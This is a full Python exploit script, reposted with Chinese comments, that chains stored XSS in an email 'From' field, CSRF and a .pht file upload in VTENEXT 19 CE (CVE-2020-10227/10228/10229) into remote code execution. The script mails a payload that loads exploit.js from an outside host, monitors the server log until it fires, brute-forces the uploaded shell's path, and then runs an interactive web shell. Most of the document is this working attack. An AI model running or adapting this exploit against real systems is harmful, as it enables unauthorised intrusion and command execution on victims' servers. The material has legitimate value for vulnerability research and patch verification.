VTENEXT 19 CE-远程执行代码漏洞 —-Hack之路

VTENEXT 19 CE-远程代码执行
#提供作者：马可·鲁埃拉
#供应商主页：https://www.vtenext.com/en/
#软件链接：供应商已从中删除易受攻击的版本sourceforge.net
#版本：19 CE
#测试对象：Ubuntu 16.04
#CVE:不适用

#2020/03/07-向供应商披露的漏洞
#2020/03/10-供应商承诺修复
#2020/09/09-公开披露

#这个脚本应该很容易理解。

#我们把这三个漏洞串联起来得到RCE。

#XSS-VTENEXT Messages模块的“From”字段易受攻击。

#文件上载-根据配置文件中的$Upload_badext检查文件扩展名。默认情况下允许并可执行.pht扩展名。

#CSRF-无CSRF保护。

# 漏洞利用.js需要托管在某个地方，IP需要被替换

#check_csrf（）应根据您的设置进行更改

#run_shell（）是一个“很好拥有”

#内容漏洞利用.js

import smtplib

import datetime

import requests

import os

import time

base_url = "http://192.168.226.168/vtenext19ce/"

print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC")

def build_url():

    d = datetime.datetime.today()

    year = str(d.year)

    month = str(d.strftime("%B"))

    week = "week" + str(d.isocalendar()[1] - d.replace(day=1).isocalendar()[1])

    tmp = base_url + "storage/home/1/" + year + "/" + month + "/" + week + "/"

    return(tmp)

def build_mail():

    _from    = """'<script src="http://192.168.226.1/exploit.js" onerror=alert(1) >'"""

    _to      = "admin@example.com"

    _subject = "Important!"

    _body    = "While you're reading this, a file is being uploaded to this server."

    msg  = "From: " + _from + "\n"

    msg += "To: " + _to + "\n"

    msg += "Subject: " + _subject + "\n\n"

    msg += _body

    return msg

def send_mail():

    msg = build_mail()

    smtp_server = '192.168.226.167'

    smtp_port   = 25

    sender   = 'user1@lab.local'

    receiver = 'admin@lab.local'

    server = smtplib.SMTP(smtp_server, smtp_port)

    server.sendmail(sender, receiver, msg)

def check_csrf():

    while True:

        is_there = os.popen('tail -n1 /var/log/apache2/access.log').read()

        if "200" in is_there and "/exploit.js" in is_there and base_url in is_there:

            print("[>] CSRF triggered")

            break

        else:

            time.sleep(0.5)

            continue

def find_shell():

    print("[>] Locating shell")

    time.sleep(1)

    tmp1 = build_url()

    for i in range(1, 9999):

        url = tmp1 + str(i) + "_shell.pht"

        r = requests.get(url)

        if r.status_code == 200:

            print("[>] Found the shell")

            print("[-] Location: " + url)

            return url

        else:

            continue

def run_shell(x):

    print("\n")

    while True:

        cmd = input("shell> ")

        if cmd == "exit":

            break

        else:

            url = x + "?x=" + cmd

            r = requests.get(url)

            print(r.text)

print("[>] Sending email")

send_mail()

print("[-] Waiting for user to open mail")

check_csrf()

shell_location = find_shell()

run_shell(shell_location)

print("[!] Done!")